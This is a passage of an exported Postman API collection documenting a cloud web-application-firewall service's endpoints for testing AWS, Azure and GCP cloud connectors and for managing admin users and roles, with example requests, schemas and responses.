}\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","global-cloud-connectors","test"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"1129c4f8-f73c-45fd-b937-d36f72202c36","name":"AWS Success","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"type\": \"aws\",\r\n    \"region\": \"ap-southeast-1\",\r\n    \"access_key_id\": \"XXXXXXXXXXXXXXXXXXXX\",\r\n    \"is_encrypted\": \"false\",\r\n    \"aws_secret_access_key\": \"*\",\r\n    \"have_vpc_id\": \"enable\",\r\n    \"vpc_id\": \"vpc-04168fa6b745cfb3a\"\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors/test"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Connect the Cloud Connector successfully.\"\n}"},{"id":"20880811-e290-4e0a-9987-2896e0d9b839","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"type\": \"aws\",\r\n    \"region\": \"ap-southeast-1\",\r\n    \"access_key_id\": \"XXXXXXXXXXXXXXXXXXXX\",\r\n    \"is_encrypted\": \"false\",\r\n    \"aws_secret_access_key\": \"*\",\r\n    \"have_vpc_id\": \"enable\"\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors/test"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Lack of required parameters.\"\n}"},{"id":"453c97eb-1570-4f35-a384-5282dbbf1abd","name":"Azure Success","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"type\": \"azure\",\r\n    \"server_region\": \"global\",\r\n    \"tenant_id\": \"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\r\n    \"client_id\": \"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\r\n    \"is_encrypted\": \"false\",\r\n    \"client_secret\": \"*\",\r\n    \"have_resource_path\": \"enable\",\r\n    \"subscription_id\": \"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\r\n    \"have_resource_group\": \"enable\",\r\n    \"resource_group\": \"cldwafCluster_koreacentral_4\" \r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors/test"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Connect the Cloud Connector successfully.\"\n}"},{"id":"6bce6e74-b28c-4c2a-8062-bbbecedf2184","name":"GCP Success","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"type\": \"gcp\",\r\n    \"project_id\": \"project-001\",\r\n    \"service_account_email\": \"test@project-001.iam.gserviceaccount.com\",\r\n    \"is_encrypted\": \"false\",\r\n    \"private_key\": \"*\",\r\n    \"zone\": \"us-west1-a\" \r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors/test"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Connect the Cloud Connector successfully.\"\n}"}],"_postman_id":"1530e698-73e5-49ed-a9d3-2f6ceceda3cc"}],"id":"96be3a48-cf42-413d-ab7d-94547bf8a854","description":"<p>The Cloud Connectors are used to support origin servers with dynamically changing IP addresses.</p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"f278c0c8-f2dd-4942-8621-88e00dabe2df"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"f6026c57-7ad1-4f7a-b993-99fb16aa4184"}}],"_postman_id":"96be3a48-cf42-413d-ab7d-94547bf8a854"},{"name":"Admin Management","item":[{"name":"Check User Validity","id":"906a5c43-befb-4c39-a35d-64dcae7f0797","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n\t\"username\": \"example@tim-cloud.com\",\n\t\"user_type\":\"admin\"\n}"},"url":"https://api.tim.waasonline.com/v1/admin/check","description":"<p>Check the validity of a subuser.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"username\", \"user_type\"],\n    \"properties\": {\n        \"username\": {\n            \"description\": \"Username to check\",\n            \"type\": \"string\"\n        },\n        \"user_type\": {\n            \"description\": \"User type to check\",\n            \"type\": \"string\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","admin","check"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"2f0cbfaa-d417-48e0-acc1-f337d53d3b6b","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"username\": \"example@timweb-cloud.com\",\n\t\"user_type\": \"admin\"\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/admin/check"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 10 Jun 2019 02:31:10 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"21"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"cee15529-8b27-11e9-80ca-61deacd85117"},{"key":"Access-Control-Allow-Origin","value":"https://www.c8.waasonline.com"},{"key":"x-amz-apigw-id","value":"bCsVOFdMIAMFZ3A="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cfdc0ee-b52bcb45dde2fe9259fa68f3;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"user_id\": \"11e56678-d3a2-11e9-bbc2-8a7b755897d1\",\n    \"acc_id\": \"916950\",\n    \"origin\": \"timCare::\"\n}"},{"id":"9eb6552d-f077-453a-83ce-483577191e2c","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"username\": \"example@timweb-cloud.com\",\n\t\"user_type\": \"admin\"\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/admin/check"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 10 Jun 2019 02:27:24 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"48"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"4711e020-8b27-11e9-a3f9-ebdca9f19e7e"},{"key":"Access-Control-Allow-Origin","value":"https://www.c8.waasonline.com"},{"key":"x-amz-apigw-id","value":"bCrxnEHxoAMFT4g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cfdc00a-d8cb0cfe5752c7c69b5ee10c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The reason why the user is invalid\"\n}"}],"_postman_id":"906a5c43-befb-4c39-a35d-64dcae7f0797"},{"name":"List Admin Users","id":"031edb05-da01-4b92-89ce-bb6586f4fc80","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json","type":"text"},{"warning":"This is a duplicate header and will be overridden by the Authorization header generated by Postman.","key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/admin?size={{size}}&cursor={{cursor}}&forward={{forward}}","description":"<p>Fetch the list of all admin users.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","admin"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>The page size.</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>To list the items of the first page, leave the cursor value empty.</p>\n<p>To go forward to next page, get the value of the \"next_cursor\" parameter in the result of the current page, then paste it here as the cursor value.</p>\n<p>To go to the previous page, get the \"prev_cursor\" value, then paste it here as the cursor value.</p>\n","type":"text/plain"},"key":"cursor","value":"{{cursor}}"},{"description":{"content":"<p>True: the next page;</p>\n<p>False: the previous page.</p>\n","type":"text/plain"},"key":"forward","value":"{{forward}}"}],"variable":[]}},"response":[{"id":"65c4cf81-44e0-4342-8b9e-09015f8e3302","name":"Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/admin?size={{size}}&cursor={{cursor}}&forward={{forward}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","admin"],"query":[{"key":"size","value":"{{size}}","description":"The page size."},{"key":"cursor","value":"{{cursor}}","description":"Cursor for the next or previous page."},{"key":"forward","value":"{{forward}}","description":"The next or previous page."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"users\": [\n        {\n            \"user_id\": \"0b12436a-d742-4622-b188-4ee2556cb758\",\n            \"username\": \"mkelesoglu@example.com\",\n            \"role_name\": \"Role-mkelesoglu@example.com\",\n            \"role_id\": \"a63512b0-0e97-4abb-af7e-4cf2c4f8db91\"\n        }\n    ],\n    \"user_perm\": \"rw\",\n    \"prev_cursor\": \"eyJ1c2VyX2lkIjogeyJTIjogIjBiMTI0MzZhLWQ3NDItNDYyMi1iMTg4LTRlZTI1NTZjYjc1OCJ9LCAic3VwZXJfaWQiOiB7IlMiOiAiNmY4OTA2NGMtODJiZS0xMWVhLWJlMjktZGU4OWVhNzY5MTc3In0sICJ1c2VyX25hbWUiOiB7IlMiOiAibWtlbGVzb2dsdUBmb3J0aW5ldC5jb20ifX0=\",\n    \"next_cursor\": \"\",\n    \"total\": 1\n}"}],"_postman_id":"031edb05-da01-4b92-89ce-bb6586f4fc80"},{"name":"Create Admin User","id":"9cbbcde6-c82a-423e-afe9-a8fa9dea94da","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"user_id\":\"uuid-v1\",\n\t\"acc_id\":\"000001\",\n\t\"username\":\"xxxxxx@example.com\",\n\t\"role_id\":\"role-id\",\n\t\"role_name\":\"role-name\" \n}"},"url":"https://api.tim.waasonline.com/v1/admin","description":"<p>Create an admin user.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"user_id\", \"acc_id\", \"username\", \"role_id\", \"role_name\"],\n    \"properties\": {\n        \"user_id\": {\n            \"description\": \"Admin user ID\",\n            \"type\": \"string\"\n        },\n        \"acc_id\": {\n            \"description\": \"Admin user account ID\",\n            \"type\": \"string\"\n        },\n        \"username\": {\n            \"description\": \"Admin username\",\n            \"type\": \"string\"\n        },\n        \"role_id\": {\n            \"description\": \"Role ID\",\n            \"type\": \"string\"\n        },\n        \"role_name\": {\n            \"description\": \"Role name\",\n            \"type\": \"string\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","admin"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"32e670d7-1a7a-4c88-b197-1712e93df44d","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"user_id\":\"uuid-v1\",\r\n\t\"acc_id\":\"000001\",\r\n\t\"username\":\"xxxxxx@example.com\",\r\n\t\"role_id\":\"role-id\",\r\n\t\"role_name\":\"role-name\" \r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/admin"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Success\"\n}"},{"id":"a3a4de10-6787-4165-96c7-585fcd879808","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"user_id\":\"uuid-v1\",\r\n\t\"acc_id\":\"000001\",\r\n\t\"username\":\"xxxxxx@example.com\",\r\n\t\"role_id\":\"role-id\",\r\n\t\"role_name\":\"role-name\" \r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/admin"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The cause of the failure\"\n}"}],"_postman_id":"9cbbcde6-c82a-423e-afe9-a8fa9dea94da"},{"name":"Update Admin User","id":"1c98ccdc-15a1-4f9a-ba7c-be9909d1ef63","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"username\":\"user-name\",\n\t\"old_role_id\":\"previous-role-id\",\n\t\"old_role_name\":\"previous-role-name\",\n\t\"new_role_id\":\"new-role-id\",\n\t\"new_role_name\":\"new-role-name\"\n}"},"url":"https://api.tim.waasonline.com/v1/admin/:user_id","description":"<p>Update the configuration of the admin user.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"username\", \"old_role_id\", \"old_role_name\", \"new_role_id\", \"new_role_name\"],\n    \"properties\": {\n        \"username\": {\n            \"description\": \"User name\",\n            \"type\": \"string\"\n        },\n        \"old_role_id\": {\n            \"description\": \"Current role ID\",\n            \"type\": \"string\"\n        },\n        \"old_role_name\": {\n            \"description\": \"Current role name\",\n            \"type\": \"string\"\n        },\n        \"new_role_id\": {\n            \"description\": \"New role ID\",\n            \"type\": \"string\"\n        },\n        \"new_role_name\": {\n            \"description\": \"New role name\",\n            \"type\": \"string\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","admin",":user_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The user ID, it can be obtained from Check User Validity API.</p>\n","type":"text/plain"},"type":"string","value":"{{user_id}}","key":"user_id"}]}},"response":[{"id":"14dbdf9c-8d1e-4c4e-9131-d905e305e8c4","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"username\":\"user-name\",\r\n\t\"old_role_id\":\"previous-role-id\",\r\n\t\"old_role_name\":\"previous-role-name\",\r\n\t\"new_role_id\":\"new-role-id\",\r\n\t\"new_role_name\":\"new-role-name\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/admin/:user_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","admin",":user_id"],"variable":[{"key":"user_id","value":""}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The cause of the failure\"\n}"},{"id":"90c36df5-8db4-497c-b638-6157d5e7c863","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"username\":\"user-name\",\r\n\t\"old_role_id\":\"previous-role-id\",\r\n\t\"old_role_name\":\"previous-role-name\",\r\n\t\"new_role_id\":\"new-role-id\",\r\n\t\"new_role_name\":\"new-role-name\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/admin/:user_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","admin",":user_id"],"variable":[{"key":"user_id","value":""}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Success\"\n}"}],"_postman_id":"1c98ccdc-15a1-4f9a-ba7c-be9909d1ef63"},{"name":"Delete Admin User","id":"3541b332-fd6c-4925-ada1-60d27a9a2dea","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/admin/:user_id?username={{user_name}}&role_id={{role_id}}&role_name={{role_name}}&type={{type}}","description":"<p>Delete an admin user.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","admin",":user_id"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>The user name.</p>\n","type":"text/plain"},"key":"username","value":"{{user_name}}"},{"description":{"content":"<p>The role ID.</p>\n","type":"text/plain"},"key":"role_id","value":"{{role_id}}"},{"description":{"content":"<p>Role name.</p>\n","type":"text/plain"},"key":"role_name","value":"{{role_name}}"},{"description":{"content":"<p>Type of admin user.</p>\n","type":"text/plain"},"key":"type","value":"{{type}}"}],"variable":[{"description":{"content":"<p>The user ID, it can be obtained from Check User Validity API.</p>\n","type":"text/plain"},"type":"string","value":"{{user_id}}","key":"user_id"}]}},"response":[{"id":"04517d13-000f-4ef2-86c2-a980ee6fd161","name":"Fail","originalRequest":{"method":"DELETE","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/admin/:user_id?username={{user_name}}&role_id={{role_id}}&role_name={{role_name}}&type={{type}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","admin",":user_id"],"query":[{"key":"username","value":"{{user_name}}","type":"text"},{"key":"role_id","value":"{{role_id}}","type":"text"},{"key":"role_name","value":"{{role_name}}","type":"text"},{"key":"type","value":"{{type}}","type":"text"}],"variable":[{"key":"user_id","value":""}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The cause of the failure\"\n}"},{"id":"311e0388-25ee-4770-9964-e9abb3d5e0cb","name":"Success","originalRequest":{"method":"DELETE","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/admin/:user_id?username={{user_name}}&role_id={{role_id}}&role_name={{role_name}}&type={{type}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","admin",":user_id"],"query":[{"key":"username","value":"{{user_name}}"},{"key":"role_id","value":"{{role_id}}"},{"key":"role_name","value":"{{role_name}}"},{"key":"type","value":"{{type}}"}],"variable":[{"key":"user_id","value":""}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Success\"\n}"}],"_postman_id":"3541b332-fd6c-4925-ada1-60d27a9a2dea"}],"id":"7ad21471-e7a9-4f05-bed7-2d1364943344","description":"<p>This section covers information about admin users.</p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"91141289-adf9-496e-b3a3-ba23b02463ea"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"7b039ecd-0fe6-46e4-b37f-6219041a17e5"}}],"_postman_id":"7ad21471-e7a9-4f05-bed7-2d1364943344"},{"name":"Role Management","item":[{"name":"List User Roles","id":"c35fd6c0-fb94-4b88-a667-78e00e7fab71","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}","warning":"This is a duplicate header and will be overridden by the Authorization header generated by Postman."}],"url":"https://api.tim.waasonline.com/v1/role","description":"<p>Fetch the list of user roles.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","role"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"a908ecd2-6ca3-4960-97c5-343ab4b150cc","name":"Success","originalRequest":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/role"},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"roles\": [\n        {\n            \"id\": \"GLOBAL-Admin\",\n            \"name\": \"Admin\",\n            \"type\": \"Admin\",\n            \"description\": \"The predefined admin role with read-write permission to all resources.\",\n            \"is_predefined\": true\n        },\n        {\n            \"id\": \"GLOBAL-Application-manager\",\n            \"name\": \"Application-manager\",\n            \"type\": \"Admin\",\n            \"description\": \"The predefined application manager role with read-write permission to application related resources.\",\n            \"is_predefined\": true\n        },\n        {\n            \"id\": \"GLOBAL-Viewer\",\n            \"name\": \"Viewer\",\n            \"type\": \"Admin\",\n            \"description\": \"The predefined guest role with read-only permission to all resources.\",\n            \"is_predefined\": true\n        }\n    ],\n    \"policy_limit\": {\n        \"/application\": \"rw\",\n        \"/template\": \"rw\",\n        \"/elog\": \"rw\",\n        \"/admin\": \"rw\",\n        \"/role\": \"rw\",\n        \"/global-setting\": \"rw\",\n        \"/contract\": \"rw\",\n        \"/mssp/tenant\": \"none\",\n        \"/mssp/contracts\": \"none\"\n    },\n    \"user_perm\": \"rw\"\n}"}],"_postman_id":"c35fd6c0-fb94-4b88-a667-78e00e7fab71"},{"name":"List User Roles Basics","id":"a3617eeb-8681-43ec-9d69-649c1ac02661","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}","warning":"This is a duplicate header and will be overridden by the Authorization header generated by Postman."}],"url":"https://api.tim.waasonline.com/v1/role?attrs={{attrs}}&type={{type}}","description":"<p>Fetch the list of user roles with basic info.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","role"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Attributes to fetch</p>\n","type":"text/plain"},"key":"attrs","value":"{{attrs}}"},{"description":{"content":"<p>Role type</p>\n","type":"text/plain"},"key":"type","value":"{{type}}"}],"variable":[]}},"response":[{"id":"060178cf-ed92-4580-b416-1ef74339bd3f","name":"Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/role?attrs={{attrs}}&type={{type}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","role"],"query":[{"key":"attrs","value":"{{attrs}}","description":"Attributes to fetch"},{"key":"type","value":"{{type}}","description":"Role type"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"roles\": [\n        {\n            \"user_id\": \"GLOBAL\",\n            \"name\": \"Admin\",\n            \"id\": \"GLOBAL-Admin\"\n        },\n        {\n            \"user_id\": \"GLOBAL\",\n            \"name\": \"Application-manager\",\n            \"id\": \"GLOBAL-Application-manager\"\n        },\n        {\n            \"user_id\": \"GLOBAL\",\n            \"name\": \"Viewer\",\n            \"id\": \"GLOBAL-Viewer\"\n        }\n    ]\n}"}],"_postman_id":"a3617eeb-8681-43ec-9d69-649c1ac02661"},{"name":"List User Role","id":"0335d674-a9cd-4596-b805-2452c4afec89","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}","warning":"This is a duplicate header and will be overridden by the Authorization header generated by Postman."}],"url":"https://api.tim.waasonline.com/v1/role/:name?role_id={{role_id}}","description":"<p>Fetch one user role.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","role",":name"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Role ID</p>\n","type":"text/plain"},"key":"role_id","value":"{{role_id}}"}],"variable":[{"description":{"content":"<p>Role name</p>\n","type":"text/plain"},"type":"string","value":"","key":"name"}]}},"response":[{"id":"9596abb4-5758-472f-bd07-9b006eaf4361","name":"Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/role/:name?role_id={{role_id}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","role",":name"],"query":[{"key":"role_id","value":"{{role_id}}"}],"variable":[{"key":"name","value":""}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"name\": \"Admin\",\n    \"id\": \"GLOBAL-Admin\",\n    \"type\": \"Admin\",\n    \"description\": \"The predefined admin role with read-write permission to all resources.\",\n    \"policy\": {\n        \"/application\": \"rw\",\n        \"/global-setting\": \"rw\",\n        \"/mssp/tenant\": \"rw\",\n        \"/template\": \"rw\",\n        \"/mssp/contracts\": \"rw\",\n        \"/contract\": \"rw\",\n        \"/admin\": \"rw\",\n        \"/elog\": \"rw\",\n        \"/role\": \"rw\"\n    },\n    \"policy_limit\": {\n        \"/application\": \"rw\",\n        \"/template\": \"rw\",\n        \"/elog\": \"rw\",\n        \"/admin\": \"rw\",\n        \"/role\": \"rw\",\n        \"/global-setting\": \"rw\",\n        \"/contract\": \"rw\",\n        \"/mssp/tenant\": \"rw\",\n        \"/mssp/contracts\": \"rw\"\n    },\n    \"user_perm\": \"rw\",\n    \"is_predefined\": true\n}"}],"_postman_id":"0335d674-a9cd-4596-b805-2452c4afec89"},{"name":"Create User Role","id":"67c272b9-dd10-4282-9304-9904b51ffdf0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Accept","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"type\":\"tenant-or-admin\",\n\t\"name\":\"user-defined-role-name\",\n\t\"description\":\"role-description\",\n\t\"policy\":{\n\t\t\"/application\":\"rw\",\n\t\t\"/application/ep-id-1\":\"ro\",\n\t\t\"/application/ep-id-2\":\"rw\",\n\t\t\"/template\":\"rw\",\n\t\t\"/elog\":\"rw\",\n\t\t\"/admin\":\"ro\",\n\t\t\"/role\":\"ro\",\n\t\t\"/global-setting\":\"rw\",\n\t\t\"/mssp/tenant\":\"rw\",\n\t\t\"/mssp/contracts\":\"rw\"\n\t\t}\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/role","description":"<p>Create an admin user.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"type\", \"name\", \"description\", \"policy\"],\n    \"properties\": {\n        \"type\": {\n            \"description\": \"Role type\",\n            \"type\": \"string\",\n        },\n        \"name\": {\n            \"description\": \"Role name\",\n            \"type\": \"string\",\n        },\n        \"description\": {\n            \"description\": \"Role description\",\n            \"type\": \"string\",\n        },\n        \"policy\": {\n            \"description\": \"Role policy detail\",\n            \"type\": \"object\",\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret 